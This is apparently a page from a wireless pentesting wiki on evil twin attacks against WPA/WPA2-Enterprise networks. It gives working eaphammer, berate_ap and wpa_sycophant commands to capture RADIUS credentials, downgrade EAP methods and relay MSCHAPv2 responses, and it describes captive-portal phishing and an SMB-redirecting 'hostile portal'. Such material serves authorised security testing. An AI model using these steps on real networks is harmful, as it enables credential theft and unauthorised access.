-
Notifications
You must be signed in to change notification settings - Fork 184
13. WPA WPA2 Enterprise (MGT) Rogue AP Evil Twin
Evil Twin Attack againt WPA/WPA2-Enterprise is only possible if:
- EAP method in use does not use client-certificate for client authentication (like EAP-TLS, PEAPv0(EAP-TLS)) because there is no credentials to steal in this case.
- EAP method in use does not enforce Server-side certificate (i.e. EAP-MD5, LEAP) or the EAP deployment does not enforce Server certificates validation on workstations (or client manually accept the invalid certificate, when possible).
Typically:
- Efficient against Android phones.
- Efficient against iOS but it prompt for certificate.
- Only a challenge-response against Windows can be captured.
This type of attack can be used to steal RADIUS credentials (cleartext or more often challenge/response, e.g. MSCHAPv2) when EAP with credentials-based client authentication is used.
- (optional) To be more convincing, certificate presented to users when authenticating should be similar to the legitimate cert. Cert in use by legitimate AP can be extracted from network capture using: https://gist.github.com/Cablethief/a2b8f0f7d5ece96423ba376d261bd711
./extract_EAP.sh -r <capture file>
./extract_EAP.sh -i mon0
- Create Enterprise Network (will ask for info to use in generated certificate) & capture EAP creds:
berate_ap --eap --mana-wpe --mana-credout <file_captured_creds> <interface_AP> <interface_internet> <SSID>
EAP modes - at least - supported: https://github.com/sensepost/hostapd-mana/wiki/MANA-EAP-Options-(aka-WPE) :
- EAP-PEAP/MSCHAPv2 (both PEAPv0 and PEAPv1)
- EAP-PEAP/GTC (both PEAPv0 and PEAPv1)
- EAP-PEAP/MD5 (both PEAPv0 and PEAPv1)
- EAP-TTLS/EAP-MD5
- EAP-TTLS/EAP-GTC
- EAP-TTLS/EAP-MSCHAPv2
- EAP-TTLS/MSCHAPv2
- EAP-TTLS/MSCHAP
- EAP-TTLS/PAP
- EAP-TTLS/CHAP
- EAP-MD5
- EAP-MSCHAPv2
- EAP-GTC
- Generate self-signed x.509 certificates
./eaphammer --cert-wizard
Info about certificates: https://github.com/s0lst1c3/eaphammer/wiki/XIV.-Cert-Wizard
- Launch Evil Twin Attack against WPA-Enterprise AP & capture EAP creds:
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \
--essid <SSID_corporate_wifi> --creds # Use WPA2 by default
When using eaphammer, default behavior is to use a balanced approach of EAP Downgrade. It suggests the following sequences of EAP methods during EAP negotiation:
# Phase 1 (outer authentication)
PEAP,TTLS,TLS,FAST
# Phase 2 (inner authentication)
GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
Eaphammer first attempts to downgrade to GTC, and then immediately falls back to stronger EAP methods if the attempt fails. This balanced approach is designed to maximize impact while minimizing the risk of protracted EAP negotiations.
Ref: https://github.com/s0lst1c3/eaphammer/wiki/VIII.-Attacking-WPA-EAP-and-WPA2-EAP-Networks
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \
--essid <SSID_corporate_wifi> --negotiate weakest --creds
In this case, eaphammer propose the EAP methods in that order:
# Phase 1 (outer authentication)
PEAP,TTLS,TLS,FAST
# Phase 2 (inner authentication)
GTC,TTLS-PAP,MD5,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,TTLS-MSCHAPV2,TTLS
Warning: More likely to increase EAP negotation time (low probability that PAP, MD5, CHAP succeed), which might decrease effectiveness of attack !
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \
--essid <SSID_corporate_wifi> --negotiate speed --creds
In this case, eaphammer propose the EAP methods that are most likely to succeed first:
# Phase 1 (outer authentication)
PEAP,TTLS,TLS,FAST
# Phase 2 (inner authentication)
MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,GTC,TTLS-PAP,TTLS-MSCHAP,MD5
Use this mode if you have trouble getting clients to finish the EAP authentication process using the default mode.
This attack can be used when EAP method uses MSCHAPv2 for client authentication. It relays challenge/response to the original AP to be able to connect to the network without having to crack MSCHAPv2 credentials.
- Spawn Evil Twin AP:
berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout <file_captured_creds> \
<interface_AP> <interface_internet> <SSID>
- Create configuration file for wpa-sycophant, based on this example:
network={
ssid="TestingEAP"
# The SSID you would like to relay and authenticate against.
scan_ssid=1
key_mgmt=WPA-EAP
# Do not modify
identity=""
anonymous_identity=""
password=""
# This initialises the variables for me.
# -------------
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
# Dont want to connect back to ourselves,
# so add your rogue BSSID here.
bssid_blacklist=00:14:22:01:23:45
}
- Run wpa-sycophant:
./wpa_sycophant.sh -c wpa_sycophant_example.conf -i <interface>
Important: Further attacks on WPA-Enterprise network require knowledge of client's RADIUS credentials in most EAP methods (EAP methods requiring mutual authentication, like MSCHAPv2)
RADIUS credentials must be added to hostapd's eap_user file. In eaphammer, an interface is available:
./ehdb --list # List creds in local db
./ehdb --add --identity <username> --password <password> # Add creds in db
./ehdb --add --identity <username> --nt-hash <ntlm_hash> # Add creds with NTLM hash in db
./ehdb --delete --identity-is <username> # Delete entry from db
./ehdb --delete --delete-all # Delete all entries in db
Ref: https://github.com/s0lst1c3/eaphammer/wiki/IX.-EAPHammer-User-Database
Important: Require knowledge of client's RADIUS credentials (added into hostapd's eap_user file) in most EAP methods (EAP methods requiring mutual authentication, like MSCHAPv2).
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \
--essid <SSID_corporate_wifi> --captive-portal
For best results on phishing:
- Clone page (wget),
- Copy cloned web page in /var/www/html/ directory(eaphammer serves webpage from here according to default Apache2 configuration).
Important: Require knowledge of client's RADIUS credentials (added into hostapd's eap_user file) in most EAP methods (EAP methods requiring mutual authentication, like MSCHAPv2).
Hostile portal attack redirects HTTP traffic to an SMB share located on the attacker's machine:
./eaphammer -i wlan0 --channel <channel_number> --auth wpa-eap \
--essid <SSID_corporate_wifi> --hostile-portal
- 01. WiFi Basics
- 02. 802.11 Specifications
- 03. WPS (WiFi Protected Setup)
- 04. WPA Protocol Overview
- 05. WPA/WPA2 Personal (PSK) Authentication
- 06. WPA/WPA2 PSK Traffic Decryption
- 07. WPA/WPA2 Enterprise (MGT)
- 08. Evil Twin Attacks
- 09. 802.11 Network Selection Algorithms
- 01. WiFi Interfaces Management
- 02. WiFi Connection
- 03. WiFi Monitoring (Passive Scanning)
- 04. Hotspot Captive Portal Bypass
- 05. WiFi Denial of Service
- 06. WEP Authentication Cracking
- 07. WPA/WPA2 Personal (PSK) Authentication Cracking
- 08. WPA/WPA2 Enterprise (MGT) Authentication Cracking
- 09. WPA/WPA2 Personal (PSK) Traffic Decryption
- 10. Basic AP (Manual Configuration)
- 11. Open Network (no passphrase) Rogue AP / Evil Twin
- 12. WPA/WPA2 Personal (PSK) Rogue AP / Evil Twin
- 13. WPA/WPA2 Enterprise (MGT) Rogue AP / Evil Twin